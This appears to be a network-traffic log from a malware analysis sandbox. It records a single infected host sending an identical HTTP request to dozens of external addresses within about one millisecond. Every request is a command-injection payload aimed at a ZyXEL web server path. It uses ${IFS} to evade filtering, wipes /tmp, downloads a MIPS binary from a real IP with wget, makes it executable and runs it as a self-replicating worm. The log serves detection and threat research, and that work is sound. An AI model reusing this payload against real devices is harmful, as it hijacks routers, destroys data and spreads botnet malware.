                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.079500914 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1301192.168.2.1457474207.205.117.144443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.079536915 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1302192.168.2.1457926182.1.168.40443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.079602003 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1303192.168.2.144627066.235.238.218443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.079639912 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1304192.168.2.1437976171.52.29.108443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.079658031 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1305192.168.2.1435434166.134.71.56443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.079699993 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1306192.168.2.144966493.33.238.68443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.079758883 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1307192.168.2.1442972104.183.202.162443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.079775095 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1308192.168.2.144796249.60.68.199443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.079813957 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1309192.168.2.1453046109.194.251.201443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.079849005 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1310192.168.2.1460628178.91.185.4443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.079889059 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1311192.168.2.1444844159.56.76.133443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.079957962 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1312192.168.2.1440764200.187.109.233443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.079987049 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1313192.168.2.1443800200.252.115.224443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.080046892 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1314192.168.2.1446910222.224.196.222443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.080094099 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1315192.168.2.1444264130.125.104.88443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.080113888 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1316192.168.2.1434674205.45.253.159443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.080162048 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1317192.168.2.1449030129.182.94.91443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.080205917 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1318192.168.2.144286045.168.94.213443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.080244064 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1319192.168.2.1451080185.13.84.233443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.080296040 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1320192.168.2.1442824110.202.254.177443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.080351114 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1321192.168.2.1434224174.231.114.123443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.080380917 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1322192.168.2.1449444198.184.118.45443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.080471992 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1323192.168.2.14517242.30.101.142443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.080492020 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1324192.168.2.1436168172.196.208.61443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.080493927 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1325192.168.2.144070492.250.203.231443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.080521107 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1326192.168.2.14512128.14.32.107443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.080528021 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1327192.168.2.1454636111.182.6.41443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.080581903 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1328192.168.2.145814248.227.95.227443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.080611944 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1329192.168.2.1457806153.104.255.153443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.080646038 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1330192.168.2.145751681.206.86.231443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.080693007 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1331192.168.2.144018464.58.29.74443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.080741882 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1332192.168.2.1458494120.171.195.189443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.080796003 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1333192.168.2.143762092.73.216.23443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.080796957 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1334192.168.2.145815051.67.81.211443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.080833912 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1335192.168.2.1460190219.93.108.159443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.080853939 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1336192.168.2.1440360109.201.188.81443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.080881119 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1337192.168.2.1445016138.161.197.34443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.080919981 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1338192.168.2.144137252.169.221.1443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.080957890 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1339192.168.2.143814475.144.237.74443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.080985069 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1340192.168.2.144893848.47.228.65443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.081026077 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1341192.168.2.1433890150.43.125.222443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.081058979 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1342192.168.2.1433304105.202.173.123443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.081110954 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1343192.168.2.1445288211.163.172.140443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.081171989 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1344192.168.2.1437212201.81.163.105443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.081222057 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1345192.168.2.145710675.37.133.131443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.081248045 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1346192.168.2.143384480.215.37.229443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.081290007 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1347192.168.2.1444398134.42.178.139443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.081337929 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1348192.168.2.145716613.251.119.103443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.081378937 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1349192.168.2.144377466.197.3.51443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.081422091 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1350192.168.2.1444054114.255.179.208443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.081466913 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1351192.168.2.144565432.48.96.46443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.081517935 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1352192.168.2.1454546223.22.10.152443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.081558943 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1353192.168.2.145085867.168.62.34443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.081607103 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1354192.168.2.1450624217.167.2.248443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.081648111 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1355192.168.2.1449862159.66.119.240443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.081682920 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1356192.168.2.143951874.55.48.108443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.081734896 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1357192.168.2.143784674.212.155.233443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.081770897 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1358192.168.2.1443388108.222.9.94443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.081832886 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1359192.168.2.1455114220.192.139.58443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.081861973 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1360192.168.2.1441922201.85.239.137443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.081906080 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1361192.168.2.1444166178.15.67.63443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.081948042 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1362192.168.2.145103013.126.69.189443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.082000971 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1363192.168.2.1448310125.6.157.83443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.082050085 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1364192.168.2.1447946140.131.19.81443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.082068920 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1365192.168.2.1454904111.20.168.108443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.082114935 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1366192.168.2.1452110118.142.51.99443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.082144022 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1367192.168.2.1435026196.182.76.31443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.085597038 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1368192.168.2.1448290200.252.246.208443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.086342096 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1369192.168.2.1455750121.152.25.93443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.086369038 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


